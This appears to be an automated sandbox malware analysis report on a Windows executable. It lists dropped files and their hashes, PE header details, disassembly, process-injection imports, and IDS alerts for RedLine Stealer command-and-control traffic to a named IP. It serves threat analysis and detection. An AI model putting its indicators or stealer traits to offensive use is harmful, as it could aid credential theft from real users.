                                                                                                                                                                                                                      Size (bytes):3381792
                                                                                                                                                                                                                      Entropy (8bit):6.094908167946797
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:49152:Y4TKuk29SIU6i5fOjPWl+0rOh5PKToEGG9I+q4dNQbZQm9aGupuu9LoeiyPaRb84:YiV+CGQ4dtBMeiJRb8+1CPwDv3uFZjN
                                                                                                                                                                                                                      MD5:BF83F8AD60CB9DB462CE62C73208A30D
                                                                                                                                                                                                                      SHA1:F1BC7DBC1E5B00426A51878719196D78981674C4
                                                                                                                                                                                                                      SHA-256:012866B68F458EC204B9BCE067AF8F4A488860774E7E17973C49E583B52B828D
                                                                                                                                                                                                                      SHA-512:AE1BDDA1C174DDF4205AB19A25737FE523DCA6A9A339030CD8A95674C243D0011121067C007BE56DEF4EAEFFC40CBDADFDCBD1E61DF3404D6A3921D196DCD81E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3...3...3...K...3..[...3..[...3..[...3..[...3..U...3...3..{3..qZ...3..qZ..1..qZ...3..qZf..3..qZ...3..Rich.3..................PE..d....k.].........." ......$..........r....................................... 4.......4...`..............................................f...Z3.@.....3.|.....1.......3. .....3..O..P-,.8............................-,..............P3..............................text...g.$.......$................. ..`.rdata.......0$.......$.............@..@.data...Ax....1..*....0.............@....pdata........1.......1.............@..@.idata...#...P3..$....2.............@..@.00cfg........3.......2.............@..@.rsrc...|.....3.......2.............@..@.reloc...x....3..z....3.............@..B........................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\libffi-7.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):32792
                                                                                                                                                                                                                      Entropy (8bit):6.372276555451265
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:JYnlpDwZH1XYEMXvdQOsNFYzsQDELCvURDa7qscTHstU0NsICwHLZxXYPoBhT/A4:JYe0Vn5Q28J8qsqMttktuTSTWDG4yhRe
                                                                                                                                                                                                                      MD5:4424BAF6ED5340DF85482FA82B857B03
                                                                                                                                                                                                                      SHA1:181B641BF21C810A486F855864CD4B8967C24C44
                                                                                                                                                                                                                      SHA-256:8C1F7F64579D01FEDFDE07E0906B1F8E607C34D5E6424C87ABE431A2322EBA79
                                                                                                                                                                                                                      SHA-512:8ADB94893ADA555DE2E82F006AB4D571FAD8A1B16AC19CA4D2EFC1065677F25D2DE5C981473FABD0398F6328C1BE1EBD4D36668EA67F8A5D25060F1980EE7E33
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........3..{]A.{]A.{]A...A.{]A..\@.{]A..\@.{]A.{\A.{]A..X@.{]A..Y@.{]A..^@.{]A..Y@.{]A..^@.{]A..]@.{]A.._@.{]ARich.{]A........................PE..d.....\.........." .....F...$.......I...................................................`..........................................j.......m..P....................f...............b...............................b...............`.. ............................text....D.......F.................. ..`.rdata..H....`.......J..............@..@.data................^..............@....pdata...............`..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\python38.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4183112
                                                                                                                                                                                                                      Entropy (8bit):6.420172758698049
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:49152:wV6CJES/Za2BaobNruDPYRQYK8JCNNtkAz+/Q46VqNo9NYxwCFIInKHJCMjntPNj:MxB/aDUQNtufeNFIKHoMjzkDU
                                                                                                                                                                                                                      MD5:D2A8A5E7380D5F4716016777818A32C5
                                                                                                                                                                                                                      SHA1:FB12F31D1D0758FE3E056875461186056121ED0C
                                                                                                                                                                                                                      SHA-256:59AB345C565304F638EFFA7C0236F26041FD06E35041A75988E13995CD28ACE9
                                                                                                                                                                                                                      SHA-512:AD1269D1367F587809E3FBE44AF703C464A88FA3B2AE0BF2AD6544B8ED938E4265AAB7E308D999E6C8297C0C85C608E3160796325286DB3188A3EDF040A02AB7
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................7[.........................................B............c...........Rich............................PE..d.....].........." .........."...............................................B.....f.@...`.........................................@I8.....X.9.|.....B.......?.P.....?.H.....B. t..p. .T............................. .................X............................text...$........................... ..`.rdata..............................@..@.data........09......"9.............@....pdata..P.....?......2=.............@..@.rsrc.........B......8?.............@..@.reloc.. t....B..v...D?.............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\select.pyd

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):26696
                                                                                                                                                                                                                      Entropy (8bit):6.101296746249305
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:6kYtqIDCNdwhBfAqXuqzz5H1IGqGbWDG4y4:6TnDCNCh93X7zzR1IGqG2y4
                                                                                                                                                                                                                      MD5:6AE54D103866AAD6F58E119D27552131
                                                                                                                                                                                                                      SHA1:BC53A92A7667FD922CE29E98DFCF5F08F798A3D2
                                                                                                                                                                                                                      SHA-256:63B81AF5D3576473C17AC929BEA0ADD5BF8D7EA95C946CAF66CBB9AD3F233A88
                                                                                                                                                                                                                      SHA-512:FF23F3196A10892EA22B28AE929330C8B08AB64909937609B7AF7BFB1623CD2F02A041FD9FAB24E4BC1754276BDAFD02D832C2F642C8ECDCB233F639BDF66DD0
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................)............................M................M......M......M.E....M......Rich...........PE..d.....].........." .........2......h...............................................a"....`..........................................?..L....@..x....p.......`.......N..H.......,....2..T............................3...............0...............................text...u........................... ..`.rdata.......0......."..............@..@.data........P.......:..............@....pdata.......`.......<..............@..@.rsrc........p.......@..............@..@.reloc..,............L..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\ucrtbase.dll

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1046080
                                                                                                                                                                                                                      Entropy (8bit):6.649151787942547
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24576:L1foGwlaDT22+Pk+j2ZXCE6cctEMmxvSZX0ypCD3:JfoBR2+PfXWrT
                                                                                                                                                                                                                      MD5:4E326FEEB3EBF1E3EB21EEB224345727
                                                                                                                                                                                                                      SHA1:F156A272DBC6695CC170B6091EF8CD41DB7BA040
                                                                                                                                                                                                                      SHA-256:3C60056371F82E4744185B6F2FA0C69042B1E78804685944132974DD13F3B6D9
                                                                                                                                                                                                                      SHA-512:BE9420A85C82EEEE685E18913A7FF152FCEAD72A90DDCC2BCC8AB53A4A1743AE98F49354023C0A32B3A1D919BDA64B5D455F6C3A49D4842BBBA4AA37C1D05D67
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........of...5...5...5..5...5...5&..5...5...5...4...5...4...5...4...5...4...5...4..5...5...5...4...5Rich...5........PE..d....]..........." .....:...........a..............................................4m....`A................................................................. ..........@J..............p........................... f..............................................text... 9.......:.................. ..`.rdata..N....P.......>..............@..@.data....&..........................@....pdata....... ......................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI37682\unicodedata.pyd

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1096264
                                                                                                                                                                                                                      Entropy (8bit):5.343512979675051
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12288:EGe9qQOZ67191SnFRFotduNFBjCmN/XlyCAx9++bBlhJk93cgewrxEeBc0bB:EGe9GK4oYhCc/+9nbDhG2wrxc0bB
                                                                                                                                                                                                                      MD5:4C0D43F1A31E76255CB592BB616683E7
                                                                                                                                                                                                                      SHA1:0A9F3D77A6E064BAEBACACC780701117F09169AD
                                                                                                                                                                                                                      SHA-256:0F84E9F0D0BF44D10527A9816FCAB495E3D797B09E7BBD1E6BD666CEB4B6C1A8
                                                                                                                                                                                                                      SHA-512:B8176A180A441FE402E86F055AA5503356E7F49E984D70AB1060DEE4F5F17FCEC9C01F75BBFF75CE5F4EF212677A6525804BE53646CC0D7817B6ED5FD83FD778
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.0v..^%..^%..^%.f.%..^%Tv_$..^%Tv[$..^%TvZ$..^%Tv]$..^%.w_$..^%cx_$..^%.._%N.^%.wS$..^%.w^$..^%.w.%..^%.w\$..^%Rich..^%................PE..d.....].........." .....L...V.......*..............................................-.....`.........................................p...X..............................H........... )..T............................)...............`..p............................text...1J.......L.................. ..`.rdata..>-...`.......P..............@..@.data................~..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exe

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\3Qv3xyyL5G.exe
                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):309760
                                                                                                                                                                                                                      Entropy (8bit):6.298481352377728
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6144:CJqAvoYumbeaLVA/HmH6iWmZx/M+VK0lA/OBYJ0tYRVxG2PTY:3AvoYumb9VA/m9WmZxlVK0lAZ/PTY
                                                                                                                                                                                                                      MD5:DA8FEE4A89F0B7CEE6C8AEE970044116
                                                                                                                                                                                                                      SHA1:226A6FBD66992A0F2DDBF5D7572FAB2CF8F5001E
                                                                                                                                                                                                                      SHA-256:4A55DA3C91388A8EA539FC750B52DD90AF5D2F33F2E7269A73C2146243ED24CD
                                                                                                                                                                                                                      SHA-512:9174BD1C379ED76BE342400949A1E431A6430297485FD9C48ED12C60E7DE94817B75D645C4EBB17B3A79D66BA813C40C36527F912E927A8EC27E4668D9C09DD8
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c.Z.'.4A'.4A'.4A..A$.4A'.5A-.4AH..A-.4AH..A&.4AH..A&.4ARich'.4A................PE..d....r^g.........."......:...4.......4.........@..........................................@.................................................pr..(.......(.......L....................................................................P..X............................text....8.......:.................. ..`.rdata...#...P...$...>..............@..@.data...............................@....pdata..L............b..............@..@.rsrc...(............f..............@..@.x64.....P.......P...j..................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exe:Zone.Identifier

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\3Qv3xyyL5G.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                      Size (bytes):26
                                                                                                                                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                      Entropy (8bit):6.298481352377728
                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                      File name:3Qv3xyyL5G.exe
                                                                                                                                                                                                                      File size:309'760 bytes
                                                                                                                                                                                                                      MD5:da8fee4a89f0b7cee6c8aee970044116
                                                                                                                                                                                                                      SHA1:226a6fbd66992a0f2ddbf5d7572fab2cf8f5001e
                                                                                                                                                                                                                      SHA256:4a55da3c91388a8ea539fc750b52dd90af5d2f33f2e7269a73c2146243ed24cd
                                                                                                                                                                                                                      SHA512:9174bd1c379ed76be342400949a1e431a6430297485fd9c48ed12c60e7de94817b75d645c4ebb17b3a79d66ba813c40c36527f912e927a8ec27e4668d9c09dd8
                                                                                                                                                                                                                      SSDEEP:6144:CJqAvoYumbeaLVA/HmH6iWmZx/M+VK0lA/OBYJ0tYRVxG2PTY:3AvoYumb9VA/m9WmZxlVK0lAZ/PTY
                                                                                                                                                                                                                      TLSH:4B644B1B2481A2CFF3987373D0149874D4BEE87566A64EA5A120F6FB071B2C34F15EB6
                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c.Z.'.4A'.4A'.4A...A$.4A'.5A-.4AH..A-.4AH..A&.4AH..A&.4ARich'.4A................PE..d....r^g.........."......:...4.......4.....

                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                      Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                                      General

                                                                                                                                                                                                                      Entrypoint:0x140003418
                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                      Imagebase:0x140000000
                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                      Time Stamp:0x675E7292 [Sun Dec 15 06:09:22 2024 UTC]
                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                                                                      OS Version Minor:2
                                                                                                                                                                                                                      File Version Major:5
                                                                                                                                                                                                                      File Version Minor:2
                                                                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                                                                      Subsystem Version Minor:2
                                                                                                                                                                                                                      Import Hash:75a1ace6800a8990783719f99f2f799f

                                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      sub esp, 00000298h
                                                                                                                                                                                                                      call 00007FC4C07E646Dh
                                                                                                                                                                                                                      call 00007FC4C07E80E4h
                                                                                                                                                                                                                      movzx eax, al
                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                      je 00007FC4C07E835Ah
                                                                                                                                                                                                                      xor ecx, ecx
                                                                                                                                                                                                                      call dword ptr [00004F50h]
                                                                                                                                                                                                                      call 00007FC4C07E8FC8h
                                                                                                                                                                                                                      mov dword ptr [esp+30h], 00000104h
                                                                                                                                                                                                                      mov edx, dword ptr [esp+30h]
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      lea ecx, dword ptr [esp+40h]
                                                                                                                                                                                                                      call 00007FC4C07E8BB2h
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      lea edx, dword ptr [00003A86h]
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      lea ecx, dword ptr [esp+40h]
                                                                                                                                                                                                                      call 00007FC4C07E8DD1h
                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                      je 00007FC4C07E83A1h
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      mov ecx, dword ptr [00004BC9h]
                                                                                                                                                                                                                      call 00007FC4C07E90D1h
                                                                                                                                                                                                                      movzx eax, al
                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                      jne 00007FC4C07E8365h
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      lea ecx, dword ptr [00003A76h]
                                                                                                                                                                                                                      call 00007FC4C07E90BEh
                                                                                                                                                                                                                      movzx eax, al
                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                      je 00007FC4C07E835Ah
                                                                                                                                                                                                                      xor ecx, ecx
                                                                                                                                                                                                                      call dword ptr [00004D2Ah]
                                                                                                                                                                                                                      call 00007FC4C07E8162h
                                                                                                                                                                                                                      xor eax, eax
                                                                                                                                                                                                                      cmp eax, 01h
                                                                                                                                                                                                                      je 00007FC4C07E835Fh
                                                                                                                                                                                                                      mov ecx, 0000C350h
                                                                                                                                                                                                                      call dword ptr [00004CC3h]
                                                                                                                                                                                                                      jmp 00007FC4C07E833Eh
                                                                                                                                                                                                                      xor ecx, ecx
                                                                                                                                                                                                                      call dword ptr [00004D09h]
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      lea edx, dword ptr [00003A4Ah]
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      lea ecx, dword ptr [esp+40h]
                                                                                                                                                                                                                      call 00007FC4C07E8D6Dh
                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                      je 00007FC4C07E838Eh
                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                      lea ecx, dword ptr [00003A4Dh]
                                                                                                                                                                                                                      call 00007FC4C07E906Dh
                                                                                                                                                                                                                      movzx eax, al
                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                      je 00007FC4C07E835Ah

                                                                                                                                                                                                                      Rich Headers

                                                                                                                                                                                                                      Programming Language:
                                                                                                                                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                      • [C++] VS2010 build 30319
                                                                                                                                                                                                                      • [RES] VS2010 build 30319
                                                                                                                                                                                                                      • [LNK] VS2010 build 30319

                                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x72700x28.rdata
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xa0000x328.rsrc
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x90000x24c.pdata
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x50000x58.rdata
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                      Sections

                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                      .text0x10000x38170x3a00e57f6aa96d8d1fd8df8d346452c516a3False0.4089439655172414data5.452547926410046IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                      .rdata0x50000x23b20x24007584ddbeb23a4142395b886720f21a63False0.4347873263888889SysEx File -5.402522872237462IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                      .data0x80000x6880x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                      .pdata0x90000x24c0x400034c646468e1547e22d14b8b3e044920False0.349609375data2.6140933403614635IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                      .rsrc0xa0000x3280x400b20114eeb22f771b9c36da6e2ac337ceFalse0.361328125data2.6200573070054105IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                      .x640xb0000x450000x45000861c3ef278d1e31e7f30eb39f9d3ac68False0.46209097599637683data6.105554681661525IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                                                                      Resources

                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                      RT_VERSION0xa0600x2c4dataEnglishUnited States0.4717514124293785

                                                                                                                                                                                                                      Imports

                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                      KERNEL32.dllGetProcAddress, GetModuleHandleA, CloseHandle, WriteProcessMemory, VirtualAllocEx, OpenProcess, GetSystemInfo, LoadLibraryA, GetVersionExW, WaitForMultipleObjects

                                                                                                                                                                                                                      Possible Origin

                                                                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                      EnglishUnited States

                                                                                                                                                                                                                      Network Behavior

                                                                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                      2024-12-15T09:15:36.515937+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.849708185.81.68.14780TCP
                                                                                                                                                                                                                      2024-12-15T09:15:39.133643+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.849709185.81.68.14780TCP
                                                                                                                                                                                                                      2024-12-15T09:15:40.808505+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-15T09:15:40.808505+01002046045ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-15T09:15:41.244052+01002043234ET MALWARE Redline Stealer TCP CnC - Id1Response1185.81.68.1471912192.168.2.849710TCP
                                                                                                                                                                                                                      2024-12-15T09:15:46.385085+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-15T09:15:46.965924+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-15T09:15:47.085853+01002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)1185.81.68.1471912192.168.2.849710TCP
                                                                                                                                                                                                                      2024-12-15T09:15:47.644462+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-15T09:15:48.092095+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-15T09:15:48.680893+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-15T09:15:50.109463+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-15T09:15:50.545600+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-15T09:15:51.079216+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-15T09:15:51.738040+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-15T09:15:52.178919+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-15T09:15:52.641511+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-15T09:15:53.079450+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-15T09:15:53.587067+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-15T09:15:53.662671+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-15T09:15:53.782925+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-15T09:15:55.164720+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-15T09:15:55.663474+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-15T09:15:56.097887+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-15T09:15:56.569250+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-15T09:15:57.078303+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-15T09:15:57.601815+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-15T09:15:58.078783+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-15T09:15:58.569508+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP
                                                                                                                                                                                                                      2024-12-15T09:15:59.162461+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.849710185.81.68.1471912TCP

                                                                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                                                                      TCP Packets

                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
